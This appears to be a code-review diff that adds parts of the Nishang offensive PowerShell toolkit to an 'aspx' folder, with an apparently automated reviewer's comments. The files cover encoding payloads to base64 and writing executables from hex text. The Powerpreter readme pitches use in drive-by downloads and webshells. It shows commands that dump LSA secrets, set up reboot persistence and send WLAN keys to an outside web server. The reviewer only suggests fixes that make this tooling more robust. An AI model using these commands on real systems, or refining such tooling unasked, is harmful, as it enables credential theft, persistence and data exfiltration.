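Review bot: the detection at the bottom is an `if`/`elseif` chain, so when both Registry-Run and WMI persistence are present only the Registry warning is printed; make the WMI check an independent `if`. In the same condition, `($wmi_1) -and ($wmi_2) -and ($wmi_3) -ne $null` applies `-ne $null` to `$wmi_3` only (comparison binds tighter than `-and`), and `$null` belongs on the left of the comparison. In the `-Remove` branch, `gwmi activeScriptEventConsumer -Namespace root\subscription | Remove-WmiObject` deletes every ActiveScript consumer on the host, not just the one Nishang registered; filter it by name the way the `__EventFilter` query does, and use the `$filterName` variable that is assigned but never referenced instead of repeating the literal. `Break` in the non-admin branch should be `return`, since `break` outside a loop propagates to the caller's scope.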


@ -0,0 +1,59 @@
<#
.SYNOPSIS
Nishang script which encodes a string to base64 string.
.DESCRIPTION
This payload encodes the given string to base64 string and writes it to base64encoded.txt in current directory.
.PARAMETER Str
The string to be encoded
.PARAMETER OutputFile
The path of the output file. Default is "encoded.txt" in the current working directory.
.PARAMETER IsString
Use this to specify if you are passing a string ins place of a filepath.
.EXAMPLE
PS > StringToBase64 "start-process calc.exe" -IsString
.LINK
http://labofapenetrationtester.blogspot.com/
https://github.com/samratashok/nishang
#>
function StringtoBase64
{
[CmdletBinding()]
Param( [Parameter(Position = 0, Mandatory = $False)]
[String]
$Str,
[Parameter(Position = 1, Mandatory = $False)]
[String]
$outputfile=".\base64encoded.txt",
[Switch]
$IsString
)
if($IsString -eq $true)
{
$utfbytes = [System.Text.Encoding]::Unicode.GetBytes($Str)
}
else
{
$utfbytes = [System.Text.Encoding]::Unicode.GetBytes((Get-Content $Str))
}
$base64string = [System.Convert]::ToBase64String($utfbytes)
Out-File -InputObject $base64string -Encoding ascii -FilePath "$outputfile"
Write-Output "Encoded data written to file $outputfile"
}
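Review bot: `[System.Text.Encoding]::Unicode.GetBytes((Get-Content $Str))` passes the array of lines that `Get-Content` returns, which PowerShell joins with spaces when binding to the `string` parameter, so the newlines of a multi-line script are lost in the encoded output; join explicitly with `(Get-Content $Str) -join "`r`n"` (or read the file with `[IO.File]::ReadAllText`). The help also disagrees with the code: `.PARAMETER OutputFile` says the default is `encoded.txt` but the parameter default is `.\base64encoded.txt`, and `.PARAMETER IsString` has the typo "ins place". `$Str` is marked `Mandatory = $False` although nothing works without it; make it mandatory so the cmdlet prompts instead of encoding an empty string.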


@ -0,0 +1,41 @@
<#
.SYNOPSIS
Nishang script to convert a PE file in hex format to executable
.DESCRIPTION
This script converts a PE file in hex to executable and writes it to user temp.
.PARAMETER Filename
Path of the hex text file from which executable will be created.
.PARAMETER EXE
Path where the executable should be created.
.EXAMPLE
PS > TexttoExe C:\evil.text C:\exe\evil.exe
.LINK
http://www.exploit-monday.com/2011/09/dropping-executables-with-powershell.html
https://github.com/samratashok/nishang
#>
function TexttoEXE
{
[CmdletBinding()] Param (
[Parameter(Position = 0, Mandatory = $True)]
[String]
$FileName,
[Parameter(Position = 1, Mandatory = $True)]
[String]$EXE
)
[String]$hexdump = get-content -path "$Filename"
[Byte[]] $temp = $hexdump -split ' '
[System.IO.File]::WriteAllBytes($EXE, $temp)
Write-Output "Executable written to file $EXE"
}
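Review bot: the `.DESCRIPTION` says the executable is written to the user temp directory, but the code writes to the caller-supplied `$EXE` path; update the help to match. `$hexdump -split ' '` yields empty tokens on repeated or trailing whitespace, and the `[Byte[]]` cast of an empty string throws, so split on `'\s+'` and drop empty elements (for example `| Where-Object { $_ }`) before the cast. A check that `$Filename` exists would also give a clearer error than the one `get-content` raises.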

14
aspx/nishang/nishang.psm1 Normal file

@ -0,0 +1,14 @@

<#
Import this module to use all the scripts in nishang, except Keylogger in current powershell session. The module must reside in the nishang folder.
PS > Import-Module .\nishang.psm1
http://www.labofapenetrationtester.com/2014/06/nishang-0-3-4.html
https://github.com/samratashok/nishang
#>
#Code stolen from here https://github.com/mattifestation/PowerSploit
Get-ChildItem -Recurse (Join-Path $PSScriptRoot *.ps1) | ForEach-Object { if ($_.Name -ne "Keylogger.ps1") {. $_.FullName}}
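Review bot: a parse error in any one script terminates the `ForEach-Object` pipeline, so none of the scripts after it are loaded and the module import fails silently for them; wrap the dot-source in `try { . $_.FullName } catch { Write-Warning "Failed to load $($_.FullName)" }`. Without an `Export-ModuleMember` line every function defined by the loaded scripts, including helpers, is exported; add an explicit export list. The header comment should also state why `Keylogger.ps1` is excluded, and the "Code stolen from here" remark would read better as a plain attribution.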

File diff suppressed because it is too large


@ -0,0 +1,33 @@
#####Powerpreter is a script module which makes it useful in scenarios like drive-by-download, document attachments, webshells etc. where one may like to pull all the functionality in Nishang in a single file or where deployment is not easy to do. Powerpreter has persistence capabilities too. See examples for help in using it.
#####Examples
.EXAMPLE
PS > Import-Module .\Powerpreter.psm1
PS> Get-Command -Module powerpreter
The first command imports the module in current powershell session.
The second command lists all the functions available with powerpreter.
.EXAMPLE
PS > Import-Module .\Powerpreter.psm1; Enable-DuplicateToken; Get-LSASecret
Use above command to import powerpreter in current powershell session and execute the two functions.
.EXAMPLE
PS > Import-Module .\Powerpreter.psm1; Persistence
Use above for reboot persistence
.EXAMPLE
PS > Import-Module .\Powerpreter.psm1
PS > Get-WLAN-Keys | Do-Exfiltration -ExfilOption Webserver -URL http://192.168.254.183/catchpost.php
Use above for exfiltration to a webserver which logs POST requests.
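Review bot: `#####Powerpreter is a script module ...` puts a whole paragraph into a level-5 Markdown heading and omits the space after the hashes, which many renderers do not treat as a heading at all; make the description a normal paragraph and keep `#####Examples` as `##### Examples`. The `.EXAMPLE` markers are comment-based-help syntax and render as plain text in Markdown, so put each example in a fenced code block with the explanation underneath. The prompts are also inconsistent (`PS >` versus `PS>`).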